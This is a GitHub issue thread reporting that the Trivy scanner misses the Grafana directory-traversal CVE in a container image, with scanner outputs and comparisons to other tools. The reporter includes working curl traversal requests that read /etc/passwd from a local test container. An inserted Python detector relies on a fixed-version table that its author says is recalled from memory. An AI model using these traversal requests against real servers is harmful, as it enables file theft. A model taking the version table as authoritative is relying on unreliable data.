aquasecurity / trivy

Find vulnerabilities, misconfigurations, secrets, SBOM in containers, Kubernetes, code repositories, clouds and more
https://aquasecurity.github.io/trivy
Apache License 2.0

Trivy not detecting CVE-2021-43798: Grafana directory traversal ? #1459

Closed stefanlasiewski closed 2 years ago

stefanlasiewski commented 2 years ago

Description

Grafana issued a notice about CVE-2021-43798: Grafana directory traversal this week. It affects all Grafana 8.x instances.

https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/

However, Trivy doesn't seem to be picking it up. Why is this?

What did you expect to happen?

I expect this command to list CVE-2021-43798:

trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798

What happened instead?

It doesn't list this CVE:

$ trivy --debug image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE-2021-43798
$ 

Output of run with -debug:

2021-12-12T13:22:19.529-0800    DEBUG  Severities: HIGH,CRITICAL
2021-12-12T13:22:19.573-0800    DEBUG  cache dir:  /Users/USER/Library/Caches/trivy
2021-12-12T13:22:19.574-0800    DEBUG  DB update was skipped because DB is the latest
2021-12-12T13:22:19.574-0800    DEBUG  DB Schema: 1, Type: 1, UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC, NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC, DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC
2021-12-12T13:22:19.574-0800    DEBUG  Vulnerability type:  [os library]
2021-12-12T13:22:19.581-0800    DEBUG  Image ID: sha256:092a480a2531b3479d9c8591169723f2b49c79e8ec4b76b9f8aad3faaeb405ec
2021-12-12T13:22:19.581-0800    DEBUG  Diff IDs: [sha256:e2eb06d8af8218cfec8210147357a68b7e13f7c485b991c288c2d01dc228bb68 sha256:f865a4a4507d0e4e597a98697aacb4f32fe33e40bfe87c751ce7d4b4ccb0f6ff sha256:6b5061d1e966a1981e77ac13b2b3f3db7d0432e46c1f580442b7b0f6bbb66adf sha256:259ecfabcacfdfc827c042f41875cccc3eda532b2bbc40a0d2318302a1dbc1de sha256:bf9d934f4f2adbf028c4e223e087ae2efbb79165e20ab7f706b67207efb4e0bb sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef sha256:c83dbe321467a37a213390da75e76aedc0a850cba33409fbddc178b4ff659ce6 sha256:46abefb2a8e81cc2a20eae36faa15582f2b209d9d29a6902a1df227b69cb9f49]
2021-12-12T13:22:19.584-0800    INFO   Detected OS: alpine
2021-12-12T13:22:19.584-0800    INFO   Detecting Alpine vulnerabilities...
2021-12-12T13:22:19.584-0800    DEBUG  alpine: os version: 3.14
2021-12-12T13:22:19.584-0800    DEBUG  alpine: the number of packages: 34
2021-12-12T13:22:19.585-0800    INFO   Number of language-specific files: 2
2021-12-12T13:22:19.585-0800    INFO   Detecting gobinary vulnerabilities...
2021-12-12T13:22:19.585-0800    DEBUG  Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-cli
2021-12-12T13:22:19.585-0800    DEBUG  Detecting library vulnerabilities, type: gobinary, path: usr/share/grafana/bin/grafana-server

grafana/grafana:8.2.1 (alpine 3.14.2)
=====================================
Total: 18 (HIGH: 18, CRITICAL: 0)

+------------+------------------+----------+-------------------+---------------+---------------------------------------+
|  LIBRARY   | VULNERABILITY ID | SEVERITY | INSTALLED VERSION | FIXED VERSION |                 TITLE                 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+
| busybox    | CVE-2021-42378   | HIGH     | 1.33.1-r3         | 1.33.1-r6     | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+          +                   +               +---------------------------------------+
| ssl_client | CVE-2021-42378   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42378 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42379 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42380 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42381 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42382 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42383 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42384 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42385 |
+            +------------------+          +                   +               +---------------------------------------+
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
|            |                  |          |                   |               | awk applet leads to denial            |
|            |                  |          |                   |               | of service and possibly...            |
|            |                  |          |                   |               | -->avd.aquasec.com/nvd/cve-2021-42386 |
+------------+------------------+----------+-------------------+---------------+---------------------------------------+

usr/share/grafana/bin/grafana-cli (gobinary)
============================================
Total: 0 (HIGH: 0, CRITICAL: 0)

usr/share/grafana/bin/grafana-server (gobinary)
===============================================
Total: 0 (HIGH: 0, CRITICAL: 0)

Output of trivy -v:

$ trivy -v
Version: 0.21.2
Vulnerability DB:
  Type: Full
  Version: 1
  UpdatedAt: 2021-12-12 18:40:08.31377395 +0000 UTC
  NextUpdate: 2021-12-13 00:40:08.31377365 +0000 UTC
  DownloadedAt: 2021-12-12 21:17:12.759986 +0000 UTC

Additional details (base image name, container registry info...):

n/a

stefanlasiewski commented 2 years ago

I can confirm that this container version is vulnerable:

$ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
94635778b7021e165ae5d1c88a6b5203ad10a527a6071ec4d64a2426b2550b3f
$ docker ps
CONTAINER ID   IMAGE                   COMMAND     CREATED         STATUS         PORTS                    NAMES
94635778b702   grafana/grafana:8.2.1   "/run.sh"   7 seconds ago   Up 6 seconds   0.0.0.0:3000->3000/tcp   grafana

$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin

jerbia commented 2 years ago

@knqyf263 I suspect Grafana is not installed through a package manager, but it's deployed as a binary, which currently Trivy does not support?

afdesk commented 2 years ago

@stefanlasiewski thanks for your report! let me investigate it.

afdesk commented 2 years ago

@jerbia you're right, Grafana is deployed as a binary, and trivy doesn't detect it.

stefanlasiewski commented 2 years ago

@afdesk Interesting. Is there a way for Trivy to detect this? Does Trivy look at the md5 sums of installed binaries, for example?

For the record, docker scan (which uses Snyk) doesn't find the vulnerability either:

$ docker scan --severity medium grafana/grafana:8.2.1

Testing grafana/grafana:8.2.1...

Organization:      stefanlasiewski
Package manager:   apk
Project name:      docker-image|grafana/grafana
Docker image:      grafana/grafana:8.2.1
Platform:          linux/amd64
Base image:        grafana/grafana:8.2.1
Licenses:          enabled

✓ Tested 34 dependencies for known issues, no vulnerable paths found.

Base Image             Vulnerabilities  Severity
grafana/grafana:8.2.1  11               0 critical, 0 high, 0 medium, 11 low

Recommendations for base image upgrade:

Minor upgrades
Base Image             Vulnerabilities  Severity
grafana/grafana:8.3.2  0                0 critical, 0 high, 0 medium, 0 low

And neither does Anchore's SBOM method with syft/grype (FTR: Grype's issue is at https://github.com/anchore/grype/issues/534 )

$ grype -q grafana/grafana:8.2.1
NAME                              INSTALLED                             FIXED-IN   VULNERABILITY        SEVERITY 
busybox                           1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
busybox                           1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      
github.com/cortexproject/cortex   v1.8.2-0.20210428155238-d382e1d80eaf             GHSA-jphm-g89m-v42p  Medium    
github.com/google/flatbuffers     v1.12.0                                          CVE-2020-35864       High      
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             GHSA-grj5-8x6q-hc9q  Medium    
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             CVE-2021-36156       Medium    
github.com/prometheus/prometheus  v1.8.2-0.20210621150501-ff58416a0b02             CVE-2019-3826        Medium    
google.golang.org/protobuf        v1.27.1                                          CVE-2015-5237        High      
ssl_client                        1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      
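
One way to cover the gap this thread describes (an application shipped as a binary, outside the package manager, so neither the apk nor the gobinary scanner attributes the CVE to it), as an added example that is not Trivy's code and not part of this issue: a Python check that reads the version file Grafana ships in the image (`usr/share/grafana/VERSION`, the file the curl output above retrieves) from an exported container filesystem and compares it against the first fixed release on each affected 8.x line. The fixed-version table is my recollection of the Grafana advisory linked in the issue and is an assumption to confirm there; the exported-rootfs layout (`docker export` into a directory) and the sample VERSION content in `demo()` are constructed for the example.

```python
import os
import re
import tempfile

CVE = "CVE-2021-43798"
# Path of the version file inside the image, relative to the exported rootfs.
VERSION_FILE = os.path.join("usr", "share", "grafana", "VERSION")

# First fixed release on each affected 8.x line.
# Assumption: taken from memory of the Grafana advisory; confirm before relying on it.
FIXED_BY_MINOR = {
    (8, 0): (8, 0, 7),
    (8, 1): (8, 1, 8),
    (8, 2): (8, 2, 7),
    (8, 3): (8, 3, 1),
}

_VER_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) from a VERSION string, or None if unparsable.

    A pre-release suffix such as '-beta1' is ignored for the comparison.
    """
    m = _VER_RE.match(text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True when the release is an 8.x build older than the fix on its minor line."""
    if version is None or version[0] != 8:
        return False
    fixed = FIXED_BY_MINOR.get(version[:2])
    if fixed is None:
        # Minor lines not in the table (8.4 and later) shipped after the fix.
        return False
    return version < fixed


def check_rootfs(rootfs):
    """Inspect an exported container filesystem and report on the CVE."""
    path = os.path.join(rootfs, VERSION_FILE)
    if not os.path.isfile(path):
        return {"found": False, "version": None, "affected": False, "cve": CVE}
    with open(path, encoding="utf-8") as fh:
        version = parse_version(fh.read())
    return {"found": True, "version": version, "affected": is_affected(version), "cve": CVE}


def demo():
    """Constructed sample rootfs holding the VERSION value seen in the issue."""
    with tempfile.TemporaryDirectory() as rootfs:
        os.makedirs(os.path.join(rootfs, "usr", "share", "grafana"))
        with open(os.path.join(rootfs, VERSION_FILE), "w", encoding="utf-8") as fh:
            fh.write("8.2.1")  # no trailing newline, as the issue's curl output shows
        return check_rootfs(rootfs)


if __name__ == "__main__":
    print(demo())
```

Run it against a real image with `docker create` followed by `docker export` into a directory and pass that directory to `check_rootfs`. The check deliberately keys on the application's own version file rather than on Go module metadata, which is why the two gobinary scans in the report above come back empty for this CVE: the affected code is Grafana itself, not one of its dependencies.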

afdesk commented 2 years ago

@stefanlasiewski in this case, trivy detected and checked two binary files, grafana-cli and grafana-server (containing three medium vulnerabilities), but the app is a scope of files... need to think it over.

Maybe I missed something.

Thanks for your investigation!

github-actions[bot] commented 2 years ago

This issue is stale because it has been labeled with inactivity.

stefanlasiewski commented 2 years ago

Hi @afdesk Do you happen to have any fixes in mind for this? It's still happening on Trivy 0.23.

stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1

stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
stefanl@stefanl:~ $ trivy --version
Version: 0.23.0

github-actions[bot] commented 2 years ago

This issue is stale because it has been labeled with inactivity.